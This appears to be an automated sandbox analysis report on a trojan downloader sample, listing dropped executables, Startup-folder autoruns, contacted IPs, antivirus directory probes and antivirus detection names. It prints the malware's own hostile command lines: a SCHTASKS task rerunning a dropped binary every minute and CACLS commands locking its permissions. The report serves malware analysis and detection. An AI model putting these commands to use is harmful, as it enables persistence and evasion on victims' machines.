NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe942ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe943b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9428b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe942dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe942ad000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe943f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94282000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9429a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe942dd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe943f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe9429b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94400000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94401000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94402000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94403000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94404000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94405000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory Oct. 16, 2023, 10:48 a.m.	process_identifier: 2564 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fe94406000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Creates executable files on the filesystem (20 events)

file	C:\Users\test22\Pictures\Opera_installer_2310160416561562552.dll
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QFIjjcHQ1ovQ2FNiOlYtJpvC.bat
file	C:\Users\test22\Pictures\vREToto7AIJ9nFpi93ZHsPlH.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gxtkOdm8JuIMvKINocMwHKZR.bat
file	C:\Users\test22\AppData\Local\90Jp43fGzN2wAaoDneRxPWDw.exe
file	C:\Users\test22\Pictures\j9BhD7GZkN6ZLJkG3SQci0cK.exe
file	C:\Users\test22\AppData\Local\iLwtD8YVYcy6ZTTZFLMnBIkj.exe
file	C:\Users\test22\AppData\Local\yyyIHm1msWpbfkB5Xs6I62Oe.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wHoBwdBzfDVtf0qc8GPa5JYS.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wnwOvRigq6vd753CtxlKRsIq.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NeR8cpItg1Q3D23L524Ffy12.bat
file	C:\Users\test22\Pictures\zhmN7sLxTTABITlz75PYuip7.exe
file	C:\Users\test22\AppData\Local\NvnqxWp3Cm1i11cWSqYaLQvf.exe
file	C:\Users\test22\Pictures\VU7axjpmxW3xOeUWMCQ7F4ix.exe
file	C:\Users\test22\Pictures\JasR85FkoNzdmfzKQ2DYJf5k.exe
file	C:\Users\test22\AppData\Local\Temp\Opera_installer_2310160416560932552.dll
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\w2N23bNbwJl8vhfKeQE2y20l.bat
file	C:\Users\test22\Pictures\BUjW8Z15kUVOZ9tRIOoW9DKz.exe
file	C:\Users\test22\AppData\Local\brzGjuEYnYJ5D5vypdkt21Cl.exe
file	C:\Users\test22\AppData\Local\RJ3NgZSEeGowPBct0V2u8e0k.exe

Creates a suspicious process (4 events)

cmdline	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "nhdues.exe" /P "test22:N"&&CACLS "nhdues.exe" /P "test22:R" /E&&echo Y\|CACLS "..\1ff8bec27e" /P "test22:N"&&CACLS "..\1ff8bec27e" /P "test22:R" /E&&Exit
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F

Drops a binary and executes it (1 event)

file	C:\Users\test22\Pictures\j9BhD7GZkN6ZLJkG3SQci0cK.exe

Drops an executable to the user AppData folder (4 events)

file	C:\Users\test22\AppData\Local\brzGjuEYnYJ5D5vypdkt21Cl.exe
file	C:\Users\test22\AppData\Local\NvnqxWp3Cm1i11cWSqYaLQvf.exe
file	C:\Users\test22\AppData\Local\90Jp43fGzN2wAaoDneRxPWDw.exe
file	C:\Users\test22\AppData\Local\RJ3NgZSEeGowPBct0V2u8e0k.exe

A process created a hidden window (9 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Oct. 16, 2023, 10:49 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\BUjW8Z15kUVOZ9tRIOoW9DKz.exe parameters: filepath: C:\Users\test22\Pictures\BUjW8Z15kUVOZ9tRIOoW9DKz.exe	1	1
ShellExecuteExW Oct. 16, 2023, 10:49 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\j9BhD7GZkN6ZLJkG3SQci0cK.exe parameters: filepath: C:\Users\test22\Pictures\j9BhD7GZkN6ZLJkG3SQci0cK.exe	1	1
ShellExecuteExW Oct. 16, 2023, 10:49 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\VU7axjpmxW3xOeUWMCQ7F4ix.exe parameters: filepath: C:\Users\test22\Pictures\VU7axjpmxW3xOeUWMCQ7F4ix.exe	1	1
ShellExecuteExW Oct. 16, 2023, 10:49 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\vREToto7AIJ9nFpi93ZHsPlH.exe parameters: --silent --allusers=0 filepath: C:\Users\test22\Pictures\vREToto7AIJ9nFpi93ZHsPlH.exe	1	1
ShellExecuteExW Oct. 16, 2023, 10:49 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\zhmN7sLxTTABITlz75PYuip7.exe parameters: filepath: C:\Users\test22\Pictures\zhmN7sLxTTABITlz75PYuip7.exe	1	1
ShellExecuteExW Oct. 16, 2023, 10:49 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\JasR85FkoNzdmfzKQ2DYJf5k.exe parameters: filepath: C:\Users\test22\Pictures\JasR85FkoNzdmfzKQ2DYJf5k.exe	1	1
ShellExecuteExW Oct. 16, 2023, 10:56 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe	1	1
ShellExecuteExW Oct. 16, 2023, 10:57 a.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW Oct. 16, 2023, 10:57 a.m.	show_type: 0 filepath_r: cmd parameters: /k echo Y\|CACLS "nhdues.exe" /P "test22:N"&&CACLS "nhdues.exe" /P "test22:R" /E&&echo Y\|CACLS "..\1ff8bec27e" /P "test22:N"&&CACLS "..\1ff8bec27e" /P "test22:R" /E&&Exit filepath: cmd	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 16, 2023, 10:48 a.m.	flags: 15 family: 0		111	0

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F

Communicates with host for which no DNS query was performed (2 events)

host	193.42.32.29
host	85.217.144.143

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Installs itself for autorun at Windows startup (8 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QFIjjcHQ1ovQ2FNiOlYtJpvC.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gxtkOdm8JuIMvKINocMwHKZR.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wnwOvRigq6vd753CtxlKRsIq.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wHoBwdBzfDVtf0qc8GPa5JYS.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NeR8cpItg1Q3D23L524Ffy12.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\w2N23bNbwJl8vhfKeQE2y20l.bat
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F

Uses suspicious command line tools or Windows utilities (6 events)

cmdline	cmd /k echo Y\|CACLS "nhdues.exe" /P "test22:N"&&CACLS "nhdues.exe" /P "test22:R" /E&&echo Y\|CACLS "..\1ff8bec27e" /P "test22:N"&&CACLS "..\1ff8bec27e" /P "test22:R" /E&&Exit
cmdline	CACLS "..\1ff8bec27e" /P "test22:N"
cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "nhdues.exe" /P "test22:N"&&CACLS "nhdues.exe" /P "test22:R" /E&&echo Y\|CACLS "..\1ff8bec27e" /P "test22:N"&&CACLS "..\1ff8bec27e" /P "test22:R" /E&&Exit
cmdline	CACLS "..\1ff8bec27e" /P "test22:R" /E
cmdline	CACLS "nhdues.exe" /P "test22:R" /E
cmdline	CACLS "nhdues.exe" /P "test22:N"

File has been identified by 59 AntiVirus engines on VirusTotal as malicious (50 out of 59 events)

Bkav	W32.Common.D753F82A
Lionic	Trojan.Win32.Upatre.1j!c
tehtris	Generic.Malware
MicroWorld-eScan	Gen:Variant.Zusy.502235
CAT-QuickHeal	Trojan.IGENERIC
Skyhigh	Downloader-FCID!D334FDBE7080
McAfee	Artemis!D334FDBE7080
Malwarebytes	Malware.AI.3634750077
Zillya	Downloader.Upatre.Win32.77227
Sangfor	Downloader.Msil.Tiny.Vfvp
K7AntiVirus	Trojan-Downloader ( 005abba61 )
Alibaba	TrojanDownloader:MSIL/Upatre.87a12464
K7GW	Trojan-Downloader ( 005abba61 )
Cybereason	malicious.e8de42
Arcabit	Trojan.Zusy.D7A9DB
VirIT	Trojan.Win32.MSIL_Heur.A
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	a variant of MSIL/TrojanDownloader.Tiny.CIQ
APEX	Malicious
Cynet	Malicious (score: 100)
Kaspersky	HEUR:Trojan-Downloader.MSIL.Upatre.gen
BitDefender	Gen:Variant.Zusy.502235
NANO-Antivirus	Trojan.Win32.Upatre.kccben
Avast	Win32:DropperX-gen [Drp]
Tencent	Malware.Win32.Gencirc.13f1cb2e
Emsisoft	Gen:Variant.Zusy.502235 (B)
F-Secure	Trojan.TR/Dldr.Tiny.jftmx
DrWeb	Trojan.DownLoaderNET.786
VIPRE	Gen:Variant.Zusy.502235
TrendMicro	TROJ_GEN.R002C0XJ923
FireEye	Generic.mg.d334fdbe7080a9e3
Sophos	Mal/Generic-S
SentinelOne	Static AI - Malicious PE
Google	Detected
Avira	TR/Dldr.Tiny.jftmx
MAX	malware (ai score=80)
Antiy-AVL	Trojan[Downloader]/MSIL.Tiny
Kingsoft	malware.kb.c.977
Gridinsoft	Ransom.Win32.Wacatac.sa
Microsoft	Trojan:Win32/Znyonm
ZoneAlarm	HEUR:Trojan-Downloader.MSIL.Upatre.gen
GData	Gen:Variant.Zusy.502235
Varist	W32/ABRisk.LPSU-0582
AhnLab-V3	Downloader/Win.FCID.C5496363
BitDefenderTheta	Gen:NN.ZemsilF.36738.am0@amCu6ff
ALYac	Gen:Variant.Marsilia.75727
VBA32	Downloader.MSIL.Pabin.Heur
Cylance	unsafe
Panda	Trj/RnkBend.A

RBY2.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All